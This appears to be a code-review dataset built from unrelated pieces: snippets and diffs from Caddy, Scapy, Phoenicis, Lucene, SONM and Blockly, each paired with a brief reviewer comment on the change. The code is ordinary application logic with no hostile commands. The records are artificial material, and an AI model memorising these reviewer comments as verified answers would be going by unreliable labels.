make(map[string]caddy.ModuleMap, len(h.matcherDefs)) for key, val := range h.matcherDefs { matcherDefs[key] = val } // find and extract any embedded matcher definitions in this scope for i := 0; i < len(segments); i++ { seg := segments[i] if strings.HasPrefix(seg.Directive(), matcherPrefix) { // parse, then add the matcher to matcherDefs err := parseMatcherDefinitions(caddyfile.NewDispenser(seg), matcherDefs) if err != nil { return nil, err } // remove the matcher segment (consumed), then step back the loop segments = append(segments[:i], segments[i+1:]...) i-- } } // with matchers ready to go, evaluate each directive's segment for _, seg := range segments { dir := seg.Directive() dirFunc, ok := registeredDirectives[dir] if !ok { return nil, h.Errf("unrecognized directive: %s", dir) } subHelper := h subHelper.Dispenser = caddyfile.NewDispenser(seg) subHelper.matcherDefs = matcherDefs results, err := dirFunc(subHelper) if err != nil { return nil, h.Errf("parsing caddyfile tokens for '%s': %v", dir, err) } for _, result := range results { result.directive = dir allResults = append(allResults, result) } } } return allResults, nil } // ConfigValue represents a value to be added to the final // configuration, or a value to be consulted when building // the final configuration. type ConfigValue struct { // The kind of value this is. As the config is // being built, the adapter will look in the // "pile" for values belonging to a certain // class when it is setting up a certain part // of the config. The associated value will be // type-asserted and placed accordingly. Class string // The value to be used when building the config. // Generally its type is associated with the // name of the Class. Value interface{} directive string } func sortRoutes(routes []ConfigValue) { dirPositions := make(map[string]int) for i, dir := range directiveOrder { dirPositions[dir] = i } sort.SliceStable(routes, func(i, j int) bool { // if the directives are different, just use the established directive order iDir, jDir := routes[i].directive, routes[j].directive if iDir != jDir { return dirPositions[iDir] < dirPositions[jDir] } // directives are the same; sub-sort by path matcher length if there's // only one matcher set and one path (this is a very common case and // usually -- but not always -- helpful/expected, oh well; user can // always take manual control of order using handler or route blocks) iRoute, ok := routes[i].Value.(caddyhttp.Route) if !ok { return false } jRoute, ok := routes[j].Value.(caddyhttp.Route) if !ok { return false } // decode the path matchers, if there is just one of them var iPM, jPM caddyhttp.MatchPath if len(iRoute.MatcherSetsRaw) == 1 { _ = json.Unmarshal(iRoute.MatcherSetsRaw[0]["path"], &iPM) } if len(jRoute.MatcherSetsRaw) == 1 { _ = json.Unmarshal(jRoute.MatcherSetsRaw[0]["path"], &jPM) } // sort by longer path (more specific) first; missing path // matchers or multi-matchers are treated as zero-length paths var iPathLen, jPathLen int if len(iPM) > 0 { iPathLen = len(iPM[0]) } if len(jPM) > 0 { jPathLen = len(jPM[0]) } // if both directives have no path matcher, use whichever one // has any kind of matcher defined first. if iPathLen == 0 && jPathLen == 0 { return len(iRoute.MatcherSetsRaw) > 0 && len(jRoute.MatcherSetsRaw) == 0 } // sort with the most-specific (longest) path first return iPathLen > jPathLen }) } // serverBlock pairs a Caddyfile server block with // a "pile" of config values, keyed by class name, // as well as its parsed keys for convenience. type serverBlock struct { block caddyfile.ServerBlock pile map[string][]ConfigValue // config values obtained from directives keys []Address } // hostsFromKeys returns a list of all the non-empty hostnames found in // the keys of the server block sb. If logger mode is false, a key with // an empty hostname portion will return an empty slice, since that // server block is interpreted to effectively match all hosts. An empty // string is never added to the slice. // // If loggerMode is true, then the non-standard ports of keys will be // joined to the hostnames. This is to effectively match the Host // header of requests that come in for that key. // // The resulting slice is not sorted but will never have duplicates. func (sb serverBlock) hostsFromKeys(loggerMode bool) []string { // ensure each entry in our list is unique hostMap := make(map[string]struct{}) for _, addr := range sb.keys { if addr.Host == "" { if !loggerMode { // server block contains a key like ":443", i.e. the host portion // is empty / catch-all, which means to match all hosts return []string{} } // never append an empty string continue } if loggerMode && addr.Port != "" && addr.Port != strconv.Itoa(caddyhttp.DefaultHTTPPort) && addr.Port != strconv.Itoa(caddyhttp.DefaultHTTPSPort) { hostMap[net.JoinHostPort(addr.Host, addr.Port)] = struct{}{} } else { hostMap[addr.Host] = struct{}{} } } // convert map to slice sblockHosts := make([]string, 0, len(hostMap)) for host := range hostMap { sblockHosts = append(sblockHosts, host) } return sblockHosts } // hasHostCatchAllKey returns true if sb has a key that // omits a host portion, i.e. it "catches all" hosts. func (sb serverBlock) hasHostCatchAllKey() bool { for _, addr := range sb.keys { if addr.Host == "" { return true } } return false } type ( // UnmarshalFunc is a function which can unmarshal Caddyfile // tokens into zero or more config values using a Helper type. // These are passed in a call to RegisterDirective. UnmarshalFunc func(h Helper) ([]ConfigValue, error) // UnmarshalHandlerFunc is like UnmarshalFunc, except the // output of the unmarshaling is an HTTP handler. This // function does not need to deal with HTTP request matching // which is abstracted away. Since writing HTTP handlers // with Caddyfile support is very common, this is a more // convenient way to add a handler to the chain since a lot // of the details common to HTTP handlers are taken care of // for you. These are passed to a call to // RegisterHandlerDirective. UnmarshalHandlerFunc func(h Helper) (caddyhttp.MiddlewareHandler, error) // UnmarshalGlobalFunc is a function which can unmarshal Caddyfile // tokens into a global option config value using a Helper type. // These are passed in a call to RegisterGlobalOption. UnmarshalGlobalFunc func(d *caddyfile.Dispenser) (interface{}, error) ) var registeredDirectives = make(map[string]UnmarshalFunc) var registeredGlobalOptions = make(map[string]UnmarshalGlobalFunc)
1
15,612
I'm not entirely clear on why this is necessary?
caddyserver-caddy
go
@@ -317,7 +317,7 @@ def save_session(fname="", session=None, pickleProto=-1): if not fname: fname = conf.session if not fname: - conf.session = fname = utils.get_temp_file(keep=True) + conf.session = fname = cast(str, utils.get_temp_file(keep=True)) log_interactive.info("Use [%s] as session file" % fname) if not session:
1
# This file is part of Scapy # See http://www.secdev.org/projects/scapy for more information # Copyright (C) Philippe Biondi <[email protected]> # This program is published under a GPLv2 license """ Main module for interactive startup. """ from __future__ import absolute_import from __future__ import print_function import sys import os import getopt import code import gzip import glob import importlib import io import logging import types import warnings from random import choice # Never add any global import, in main.py, that would trigger a # warning message before the console handlers gets added in interact() from scapy.error import ( log_interactive, log_loading, Scapy_Exception, ) import scapy.modules.six as six from scapy.themes import DefaultTheme, BlackAndWhite, apply_ipython_style from scapy.consts import WINDOWS from scapy.compat import ( cast, Any, Dict, List, Optional, Tuple, Union ) IGNORED = list(six.moves.builtins.__dict__) LAYER_ALIASES = { "tls": "tls.all" } QUOTES = [ ("Craft packets like it is your last day on earth.", "Lao-Tze"), ("Craft packets like I craft my beer.", "Jean De Clerck"), ("Craft packets before they craft you.", "Socrate"), ("Craft me if you can.", "IPv6 layer"), ("To craft a packet, you have to be a packet, and learn how to swim in " "the wires and in the waves.", "Jean-Claude Van Damme"), ("We are in France, we say Skappee. OK? Merci.", "Sebastien Chabal"), ("Wanna support scapy? Rate it on sectools! " "http://sectools.org/tool/scapy/", "Satoshi Nakamoto"), ("What is dead may never die!", "Python 2"), ] def _probe_config_file(cf): # type: (str) -> Union[str, None] cf_path = os.path.join(os.path.expanduser("~"), cf) try: os.stat(cf_path) except OSError: return None else: return cf_path def _read_config_file(cf, _globals=globals(), _locals=locals(), interactive=True): # type: (str, Dict[str, Any], Dict[str, Any], bool) -> None """Read a config file: execute a python file while loading scapy, that may contain some pre-configured values. If _globals or _locals are specified, they will be updated with the loaded vars. This allows an external program to use the function. Otherwise, vars are only available from inside the scapy console. params: - _globals: the globals() vars - _locals: the locals() vars - interactive: specified whether or not errors should be printed using the scapy console or raised. ex, content of a config.py file: 'conf.verb = 42\n' Manual loading: >>> _read_config_file("./config.py")) >>> conf.verb 42 """ log_loading.debug("Loading config file [%s]", cf) try: with open(cf) as cfgf: exec( compile(cfgf.read(), cf, 'exec'), _globals, _locals ) except IOError as e: if interactive: raise log_loading.warning("Cannot read config file [%s] [%s]", cf, e) except Exception: if interactive: raise log_loading.exception("Error during evaluation of config file [%s]", cf) def _validate_local(x): # type: (str) -> bool """Returns whether or not a variable should be imported. Will return False for any default modules (sys), or if they are detected as private vars (starting with a _)""" global IGNORED return x[0] != "_" and x not in IGNORED DEFAULT_PRESTART_FILE = _probe_config_file(".scapy_prestart.py") DEFAULT_STARTUP_FILE = _probe_config_file(".scapy_startup.py") def _usage(): # type: () -> None print( "Usage: scapy.py [-s sessionfile] [-c new_startup_file] " "[-p new_prestart_file] [-C] [-P] [-H]\n" "Args:\n" "\t-H: header-less start\n" "\t-C: do not read startup file\n" "\t-P: do not read pre-startup file\n" ) sys.exit(0) ###################### # Extension system # ###################### def _load(module, globals_dict=None, symb_list=None): # type: (str, Optional[Dict[str, Any]], Optional[List[str]]) -> None """Loads a Python module to make variables, objects and functions available globally. The idea is to load the module using importlib, then copy the symbols to the global symbol table. """ if globals_dict is None: globals_dict = six.moves.builtins.__dict__ try: mod = importlib.import_module(module) if '__all__' in mod.__dict__: # import listed symbols for name in mod.__dict__['__all__']: if symb_list is not None: symb_list.append(name) globals_dict[name] = mod.__dict__[name] else: # only import non-private symbols for name, sym in six.iteritems(mod.__dict__): if _validate_local(name): if symb_list is not None: symb_list.append(name) globals_dict[name] = sym except Exception: log_interactive.error("Loading module %s", module, exc_info=True) def load_module(name, globals_dict=None, symb_list=None): # type: (str, Optional[Dict[str, Any]], Optional[List[str]]) -> None """Loads a Scapy module to make variables, objects and functions available globally. """ _load("scapy.modules." + name, globals_dict=globals_dict, symb_list=symb_list) def load_layer(name, globals_dict=None, symb_list=None): # type: (str, Optional[Dict[str, Any]], Optional[List[str]]) -> None """Loads a Scapy layer module to make variables, objects and functions available globally. """ _load("scapy.layers." + LAYER_ALIASES.get(name, name), globals_dict=globals_dict, symb_list=symb_list) def load_contrib(name, globals_dict=None, symb_list=None): # type: (str, Optional[Dict[str, Any]], Optional[List[str]]) -> None """Loads a Scapy contrib module to make variables, objects and functions available globally. If no contrib module can be found with the given name, try to find a layer module, since a contrib module may become a layer module. """ try: importlib.import_module("scapy.contrib." + name) _load("scapy.contrib." + name, globals_dict=globals_dict, symb_list=symb_list) except ImportError as e: # if layer not found in contrib, try in layers try: load_layer(name, globals_dict=globals_dict, symb_list=symb_list) except ImportError: raise e # Let's raise the original error to avoid confusion def list_contrib(name=None, # type: Optional[str] ret=False, # type: bool _debug=False # type: bool ): # type: (...) -> Optional[List[Dict[str, Union[str, None]]]] """Show the list of all existing contribs. :param name: filter to search the contribs :param ret: whether the function should return a dict instead of printing it :returns: None or a dictionary containing the results if ret=True """ # _debug: checks that all contrib modules have correctly defined: # # scapy.contrib.description = [...] # # scapy.contrib.status = [...] # # scapy.contrib.name = [...] (optional) # or set the flag: # # scapy.contrib.description = skip # to skip the file if name is None: name = "*.py" elif "*" not in name and "?" not in name and not name.endswith(".py"): name += ".py" results = [] # type: List[Dict[str, Union[str, None]]] dir_path = os.path.join(os.path.dirname(__file__), "contrib") if sys.version_info >= (3, 5): name = os.path.join(dir_path, "**", name) iterator = glob.iglob(name, recursive=True) else: name = os.path.join(dir_path, name) iterator = glob.iglob(name) for f in iterator: mod = f.replace(os.path.sep, ".").partition("contrib.")[2] if mod.startswith("__"): continue if mod.endswith(".py"): mod = mod[:-3] desc = {"description": None, "status": None, "name": mod} with io.open(f, errors="replace") as fd: for line in fd: if line[0] != "#": continue p = line.find("scapy.contrib.") if p >= 0: p += 14 q = line.find("=", p) key = line[p:q].strip() value = line[q + 1:].strip() desc[key] = value if desc["status"] == "skip": break if desc["description"] and desc["status"]: results.append(desc) break if _debug: if desc["status"] == "skip": pass elif not desc["description"] or not desc["status"]: raise Scapy_Exception("Module %s is missing its " "contrib infos !" % mod) results.sort(key=lambda x: x["name"]) if ret: return results else: for desc in results: print("%(name)-20s: %(description)-40s status=%(status)s" % desc) return None ############################## # Session saving/restoring # ############################## def update_ipython_session(session): # type: (Dict[str, Any]) -> None """Updates IPython session with a custom one""" try: from IPython import get_ipython get_ipython().user_ns.update(session) except Exception: pass def save_session(fname="", session=None, pickleProto=-1): # type: (str, Optional[Dict[str, Any]], int) -> None """Save current Scapy session to the file specified in the fname arg. params: - fname: file to save the scapy session in - session: scapy session to use. If None, the console one will be used - pickleProto: pickle proto version (default: -1 = latest)""" from scapy import utils from scapy.config import conf, ConfClass if not fname: fname = conf.session if not fname: conf.session = fname = utils.get_temp_file(keep=True) log_interactive.info("Use [%s] as session file" % fname) if not session: try: from IPython import get_ipython session = get_ipython().user_ns except Exception: session = six.moves.builtins.__dict__["scapy_session"] to_be_saved = cast(Dict[str, Any], session).copy() if "__builtins__" in to_be_saved: del(to_be_saved["__builtins__"]) for k in list(to_be_saved): i = to_be_saved[k] if hasattr(i, "__module__") and (k[0] == "_" or i.__module__.startswith("IPython")): del(to_be_saved[k]) if isinstance(i, ConfClass): del(to_be_saved[k]) elif isinstance(i, (type, type, types.ModuleType)): if k[0] != "_": log_interactive.error("[%s] (%s) can't be saved.", k, type(to_be_saved[k])) del(to_be_saved[k]) try: os.rename(fname, fname + ".bak") except OSError: pass f = gzip.open(fname, "wb") six.moves.cPickle.dump(to_be_saved, f, pickleProto) f.close() def load_session(fname=None): # type: (Optional[Union[str, None]]) -> None """Load current Scapy session from the file specified in the fname arg. This will erase any existing session. params: - fname: file to load the scapy session from""" from scapy.config import conf if fname is None: fname = conf.session try: s = six.moves.cPickle.load(gzip.open(fname, "rb")) except IOError: try: s = six.moves.cPickle.load(open(fname, "rb")) except IOError: # Raise "No such file exception" raise scapy_session = six.moves.builtins.__dict__["scapy_session"] scapy_session.clear() scapy_session.update(s) update_ipython_session(scapy_session) log_loading.info("Loaded session [%s]" % fname) def update_session(fname=None): # type: (Optional[Union[str, None]]) -> None """Update current Scapy session from the file specified in the fname arg. params: - fname: file to load the scapy session from""" from scapy.config import conf if fname is None: fname = conf.session try: s = six.moves.cPickle.load(gzip.open(fname, "rb")) except IOError: s = six.moves.cPickle.load(open(fname, "rb")) scapy_session = six.moves.builtins.__dict__["scapy_session"] scapy_session.update(s) update_ipython_session(scapy_session) def init_session(session_name, # type: Optional[Union[str, None]] mydict=None # type: Optional[Union[Dict[str, Any], None]] ): # type: (...) -> Tuple[Dict[str, Any], List[str]] from scapy.config import conf SESSION = {} # type: Dict[str, Any] GLOBKEYS = [] # type: List[str] scapy_builtins = {k: v for k, v in six.iteritems( importlib.import_module(".all", "scapy").__dict__ ) if _validate_local(k)} six.moves.builtins.__dict__.update(scapy_builtins) GLOBKEYS.extend(scapy_builtins) GLOBKEYS.append("scapy_session") if session_name: try: os.stat(session_name) except OSError: log_loading.info("New session [%s]" % session_name) else: try: try: SESSION = six.moves.cPickle.load(gzip.open(session_name, "rb")) except IOError: SESSION = six.moves.cPickle.load(open(session_name, "rb")) log_loading.info("Using session [%s]" % session_name) except ValueError: msg = "Error opening Python3 pickled session on Python2 [%s]" log_loading.error(msg % session_name) except EOFError: log_loading.error("Error opening session [%s]" % session_name) except AttributeError: log_loading.error("Error opening session [%s]. " "Attribute missing" % session_name) if SESSION: if "conf" in SESSION: conf.configure(SESSION["conf"]) conf.session = session_name SESSION["conf"] = conf else: conf.session = session_name else: conf.session = session_name SESSION = {"conf": conf} else: SESSION = {"conf": conf} six.moves.builtins.__dict__["scapy_session"] = SESSION if mydict is not None: six.moves.builtins.__dict__["scapy_session"].update(mydict) update_ipython_session(mydict) GLOBKEYS.extend(mydict) return SESSION, GLOBKEYS ################ # Main # ################ def _prepare_quote(quote, author, max_len=78): # type: (str, str, int) -> List[str] """This function processes a quote and returns a string that is ready to be used in the fancy prompt. """ _quote = quote.split(' ') max_len -= 6 lines = [] cur_line = [] # type: List[str] def _len(line): # type: (List[str]) -> int return sum(len(elt) for elt in line) + len(line) - 1 while _quote: if not cur_line or (_len(cur_line) + len(_quote[0]) - 1 <= max_len): cur_line.append(_quote.pop(0)) continue lines.append(' | %s' % ' '.join(cur_line)) cur_line = [] if cur_line: lines.append(' | %s' % ' '.join(cur_line)) cur_line = [] lines.append(' | %s-- %s' % (" " * (max_len - len(author) - 5), author)) return lines def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): # type: (Optional[Any], Optional[Any], Optional[Any], int) -> None """ Starts Scapy's console. """ # We're in interactive mode, let's throw the DeprecationWarnings warnings.simplefilter("always") # Set interactive mode, load the color scheme from scapy.config import conf conf.interactive = True conf.color_theme = DefaultTheme() if loglevel is not None: conf.logLevel = loglevel STARTUP_FILE = DEFAULT_STARTUP_FILE PRESTART_FILE = DEFAULT_PRESTART_FILE session_name = None if argv is None: argv = sys.argv try: opts = getopt.getopt(argv[1:], "hs:Cc:Pp:d:H") for opt, parm in opts[0]: if opt == "-h": _usage() elif opt == "-H": conf.fancy_prompt = False conf.verb = 30 elif opt == "-s": session_name = parm elif opt == "-c": STARTUP_FILE = parm elif opt == "-C": STARTUP_FILE = None elif opt == "-p": PRESTART_FILE = parm elif opt == "-P": PRESTART_FILE = None elif opt == "-d": conf.logLevel = max(1, conf.logLevel - 10) if len(opts[1]) > 0: raise getopt.GetoptError( "Too many parameters : [%s]" % " ".join(opts[1]) ) except getopt.GetoptError as msg: log_loading.error(msg) sys.exit(1) # Reset sys.argv, otherwise IPython thinks it is for him sys.argv = sys.argv[:1] SESSION, GLOBKEYS = init_session(session_name, mydict) if STARTUP_FILE: _read_config_file(STARTUP_FILE, interactive=True) if PRESTART_FILE: _read_config_file(PRESTART_FILE, interactive=True) if not conf.interactive_shell or conf.interactive_shell.lower() in [ "ipython", "auto" ]: try: import IPython from IPython import start_ipython except ImportError: log_loading.warning( "IPython not available. Using standard Python shell " "instead.\nAutoCompletion, History are disabled." ) if WINDOWS: log_loading.warning( "On Windows, colors are also disabled" ) conf.color_theme = BlackAndWhite() IPYTHON = False else: IPYTHON = True else: IPYTHON = False if conf.fancy_prompt: from scapy.utils import get_terminal_width mini_banner = (get_terminal_width() or 84) <= 75 the_logo = [ " ", " aSPY//YASa ", " apyyyyCY//////////YCa ", " sY//////YSpcs scpCY//Pp ", " ayp ayyyyyyySCP//Pp syY//C ", " AYAsAYYYYYYYY///Ps cY//S", " pCCCCY//p cSSps y//Y", " SPPPP///a pP///AC//Y", " A//A cyP////C", " p///Ac sC///a", " P////YCpc A//A", " scccccp///pSP///p p//Y", " sY/////////y caa S//P", " cayCyayP//Ya pY/Ya", " sY/PsY////YCc aC//Yp ", " sc sccaCY//PCypaapyCP//YSs ", " spCPY//////YPSps ", " ccaacs ", " ", ] # Used on mini screens the_logo_mini = [ " .SYPACCCSASYY ", "P /SCS/CCS ACS", " /A AC", " A/PS /SPPS", " YP (SC", " SPS/A. SC", " Y/PACC PP", " PY*AYC CAA", " YYCY//SCYP ", ] the_banner = [ "", "", " |", " | Welcome to Scapy", " | Version %s" % conf.version, " |", " | https://github.com/secdev/scapy", " |", " | Have fun!", " |", ] if mini_banner: the_logo = the_logo_mini the_banner = [x[2:] for x in the_banner[3:-1]] the_banner = [""] + the_banner + [""] else: quote, author = choice(QUOTES) the_banner.extend(_prepare_quote(quote, author, max_len=39)) the_banner.append(" |") banner_text = "\n".join( logo + banner for logo, banner in six.moves.zip_longest( (conf.color_theme.logo(line) for line in the_logo), (conf.color_theme.success(line) for line in the_banner), fillvalue="" ) ) else: banner_text = "Welcome to Scapy (%s)" % conf.version if mybanner is not None: banner_text += "\n" banner_text += mybanner if IPYTHON: banner = banner_text + " using IPython %s\n" % IPython.__version__ try: from traitlets.config.loader import Config except ImportError: log_loading.warning( "traitlets not available. Some Scapy shell features won't be " "available." ) try: start_ipython( display_banner=False, user_ns=SESSION, exec_lines=["print(\"\"\"" + banner + "\"\"\")"] ) except Exception: code.interact(banner=banner_text, local=SESSION) else: cfg = Config() try: from IPython import get_ipython if not get_ipython(): raise ImportError except ImportError: # Set "classic" prompt style when launched from # run_scapy(.bat) files Register and apply scapy # color+prompt style apply_ipython_style(shell=cfg.TerminalInteractiveShell) cfg.TerminalInteractiveShell.confirm_exit = False cfg.TerminalInteractiveShell.separate_in = u'' if int(IPython.__version__[0]) >= 6: cfg.TerminalInteractiveShell.term_title_format = ("Scapy v%s" % conf.version) # As of IPython 6-7, the jedi completion module is a dumpster # of fire that should be scrapped never to be seen again. cfg.Completer.use_jedi = False else: cfg.TerminalInteractiveShell.term_title = False cfg.HistoryAccessor.hist_file = conf.histfile cfg.InteractiveShell.banner1 = banner # configuration can thus be specified here. try: start_ipython(config=cfg, user_ns=SESSION) except (AttributeError, TypeError): code.interact(banner=banner_text, local=SESSION) else: code.interact(banner=banner_text, local=SESSION) if conf.session: save_session(conf.session, SESSION) for k in GLOBKEYS: try: del(six.moves.builtins.__dict__[k]) except Exception: pass if __name__ == "__main__": interact()
1
18,377
Why do we need to cast to `str` here?
secdev-scapy
py
@@ -17,7 +17,6 @@ import org.testfx.api.FxToolkit; public class AppConfigurationInitialisationTest { @Test - @Ignore public void testAppConfigurationInitialisation() throws TimeoutException { FxToolkit.registerPrimaryStage(); FxToolkit.setupFixture(() -> new AnnotationConfigApplicationContext(AppConfiguration.class));
1
/** * */ package org.phoenicis.javafx; import java.util.concurrent.TimeoutException; import org.junit.Ignore; import org.junit.Test; import org.springframework.context.annotation.AnnotationConfigApplicationContext; import org.testfx.api.FxToolkit; /** * @author marc * */ public class AppConfigurationInitialisationTest { @Test @Ignore public void testAppConfigurationInitialisation() throws TimeoutException { FxToolkit.registerPrimaryStage(); FxToolkit.setupFixture(() -> new AnnotationConfigApplicationContext(AppConfiguration.class)); } }
1
9,317
The ignore import above should be unused now and can be removed.
PhoenicisOrg-phoenicis
java
@@ -231,4 +231,12 @@ final class MultiTermQueryConstantScoreWrapper<Q extends MultiTermQuery> extends }; } + + @Override + public void visit(QueryVisitor visitor) { + QueryVisitor v = visitor.getSubVisitor(Occur.FILTER, this); + if (v != null) { + query.visit(v); + } + } }
1
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.lucene.search; import java.io.IOException; import java.util.ArrayList; import java.util.List; import java.util.Objects; import org.apache.lucene.index.LeafReaderContext; import org.apache.lucene.index.PostingsEnum; import org.apache.lucene.index.Term; import org.apache.lucene.index.TermState; import org.apache.lucene.index.TermStates; import org.apache.lucene.index.Terms; import org.apache.lucene.index.TermsEnum; import org.apache.lucene.search.BooleanClause.Occur; import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.DocIdSetBuilder; /** * This class also provides the functionality behind * {@link MultiTermQuery#CONSTANT_SCORE_REWRITE}. * It tries to rewrite per-segment as a boolean query * that returns a constant score and otherwise fills a * bit set with matches and builds a Scorer on top of * this bit set. */ final class MultiTermQueryConstantScoreWrapper<Q extends MultiTermQuery> extends Query { // mtq that matches 16 terms or less will be executed as a regular disjunction private static final int BOOLEAN_REWRITE_TERM_COUNT_THRESHOLD = 16; private static class TermAndState { final BytesRef term; final TermState state; final int docFreq; final long totalTermFreq; TermAndState(BytesRef term, TermState state, int docFreq, long totalTermFreq) { this.term = term; this.state = state; this.docFreq = docFreq; this.totalTermFreq = totalTermFreq; } } private static class WeightOrDocIdSet { final Weight weight; final DocIdSet set; WeightOrDocIdSet(Weight weight) { this.weight = Objects.requireNonNull(weight); this.set = null; } WeightOrDocIdSet(DocIdSet bitset) { this.set = bitset; this.weight = null; } } protected final Q query; /** * Wrap a {@link MultiTermQuery} as a Filter. */ protected MultiTermQueryConstantScoreWrapper(Q query) { this.query = query; } @Override public String toString(String field) { // query.toString should be ok for the filter, too, if the query boost is 1.0f return query.toString(field); } @Override public final boolean equals(final Object other) { return sameClassAs(other) && query.equals(((MultiTermQueryConstantScoreWrapper<?>) other).query); } @Override public final int hashCode() { return 31 * classHash() + query.hashCode(); } /** Returns the encapsulated query */ public Q getQuery() { return query; } /** Returns the field name for this query */ public final String getField() { return query.getField(); } @Override public Weight createWeight(IndexSearcher searcher, ScoreMode scoreMode, float boost) throws IOException { return new ConstantScoreWeight(this, boost) { /** Try to collect terms from the given terms enum and return true iff all * terms could be collected. If {@code false} is returned, the enum is * left positioned on the next term. */ private boolean collectTerms(LeafReaderContext context, TermsEnum termsEnum, List<TermAndState> terms) throws IOException { final int threshold = Math.min(BOOLEAN_REWRITE_TERM_COUNT_THRESHOLD, BooleanQuery.getMaxClauseCount()); for (int i = 0; i < threshold; ++i) { final BytesRef term = termsEnum.next(); if (term == null) { return true; } TermState state = termsEnum.termState(); terms.add(new TermAndState(BytesRef.deepCopyOf(term), state, termsEnum.docFreq(), termsEnum.totalTermFreq())); } return termsEnum.next() == null; } /** * On the given leaf context, try to either rewrite to a disjunction if * there are few terms, or build a bitset containing matching docs. */ private WeightOrDocIdSet rewrite(LeafReaderContext context) throws IOException { final Terms terms = context.reader().terms(query.field); if (terms == null) { // field does not exist return new WeightOrDocIdSet((DocIdSet) null); } final TermsEnum termsEnum = query.getTermsEnum(terms); assert termsEnum != null; PostingsEnum docs = null; final List<TermAndState> collectedTerms = new ArrayList<>(); if (collectTerms(context, termsEnum, collectedTerms)) { // build a boolean query BooleanQuery.Builder bq = new BooleanQuery.Builder(); for (TermAndState t : collectedTerms) { final TermStates termStates = new TermStates(searcher.getTopReaderContext()); termStates.register(t.state, context.ord, t.docFreq, t.totalTermFreq); bq.add(new TermQuery(new Term(query.field, t.term), termStates), Occur.SHOULD); } Query q = new ConstantScoreQuery(bq.build()); final Weight weight = searcher.rewrite(q).createWeight(searcher, scoreMode, score()); return new WeightOrDocIdSet(weight); } // Too many terms: go back to the terms we already collected and start building the bit set DocIdSetBuilder builder = new DocIdSetBuilder(context.reader().maxDoc(), terms); if (collectedTerms.isEmpty() == false) { TermsEnum termsEnum2 = terms.iterator(); for (TermAndState t : collectedTerms) { termsEnum2.seekExact(t.term, t.state); docs = termsEnum2.postings(docs, PostingsEnum.NONE); builder.add(docs); } } // Then keep filling the bit set with remaining terms do { docs = termsEnum.postings(docs, PostingsEnum.NONE); builder.add(docs); } while (termsEnum.next() != null); return new WeightOrDocIdSet(builder.build()); } private Scorer scorer(DocIdSet set) throws IOException { if (set == null) { return null; } final DocIdSetIterator disi = set.iterator(); if (disi == null) { return null; } return new ConstantScoreScorer(this, score(), scoreMode, disi); } @Override public BulkScorer bulkScorer(LeafReaderContext context) throws IOException { final WeightOrDocIdSet weightOrBitSet = rewrite(context); if (weightOrBitSet.weight != null) { return weightOrBitSet.weight.bulkScorer(context); } else { final Scorer scorer = scorer(weightOrBitSet.set); if (scorer == null) { return null; } return new DefaultBulkScorer(scorer); } } @Override public Matches matches(LeafReaderContext context, int doc) throws IOException { final Terms terms = context.reader().terms(query.field); if (terms == null) { return null; } if (terms.hasPositions() == false) { return super.matches(context, doc); } return MatchesUtils.forField(query.field, () -> DisjunctionMatchesIterator.fromTermsEnum(context, doc, query, query.field, query.getTermsEnum(terms))); } @Override public Scorer scorer(LeafReaderContext context) throws IOException { final WeightOrDocIdSet weightOrBitSet = rewrite(context); if (weightOrBitSet.weight != null) { return weightOrBitSet.weight.scorer(context); } else { return scorer(weightOrBitSet.set); } } @Override public boolean isCacheable(LeafReaderContext ctx) { return true; } }; } }
1
28,606
redundant null check?
apache-lucene-solr
java
@@ -11,5 +11,5 @@ func NewRAMDevice() (*sonm.RAMDevice, error) { return nil, err } - return &sonm.RAMDevice{Total: m.Total}, err + return &sonm.RAMDevice{Total: m.Total, Available: m.Total}, err }
1
package ram import ( "github.com/shirou/gopsutil/mem" "github.com/sonm-io/core/proto" ) func NewRAMDevice() (*sonm.RAMDevice, error) { m, err := mem.VirtualMemory() if err != nil { return nil, err } return &sonm.RAMDevice{Total: m.Total}, err }
1
6,924
initialization of available ram is here
sonm-io-core
go
@@ -603,8 +603,12 @@ Blockly.Field.prototype.getDisplayText_ = function() { // Replace whitespace with non-breaking spaces so the text doesn't collapse. text = text.replace(/\s/g, Blockly.Field.NBSP); if (this.sourceBlock_.RTL) { - // The SVG is LTR, force text to be RTL. - text += '\u200F'; + // The SVG is LTR, force text to be RTL unless a number. + if (this.sourceBlock_.editable_ && this.sourceBlock_.type === 'math_number') { + text += '\u200E'; + } else { + text = '\u202B' + text + '\u202C'; + } } return text; };
1
/** * @license * Visual Blocks Editor * * Copyright 2012 Google Inc. * https://developers.google.com/blockly/ * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /** * @fileoverview Field. Used for editable titles, variables, etc. * This is an abstract class that defines the UI on the block. Actual * instances would be Blockly.FieldTextInput, Blockly.FieldDropdown, etc. * @author [email protected] (Neil Fraser) */ 'use strict'; goog.provide('Blockly.Field'); goog.require('Blockly.Events.BlockChange'); goog.require('Blockly.Gesture'); goog.require('goog.asserts'); goog.require('goog.dom'); goog.require('goog.math.Size'); goog.require('goog.style'); goog.require('goog.userAgent'); /** * Abstract class for an editable field. * @param {string} text The initial content of the field. * @param {Function=} opt_validator An optional function that is called * to validate any constraints on what the user entered. Takes the new * text as an argument and returns either the accepted text, a replacement * text, or null to abort the change. * @constructor */ Blockly.Field = function(text, opt_validator) { this.size_ = new goog.math.Size( Blockly.BlockSvg.FIELD_WIDTH, Blockly.BlockSvg.FIELD_HEIGHT); this.setValue(text); this.setValidator(opt_validator); /** * Maximum characters of text to display before adding an ellipsis. * Same for strings and numbers. * @type {number} */ this.maxDisplayLength = Blockly.BlockSvg.MAX_DISPLAY_LENGTH; }; /** * The set of all registered fields, keyed by field type as used in the JSON * definition of a block. * @type {!Object<string, !{fromJson: Function}>} * @private */ Blockly.Field.TYPE_MAP_ = {}; /** * Registers a field type. May also override an existing field type. * 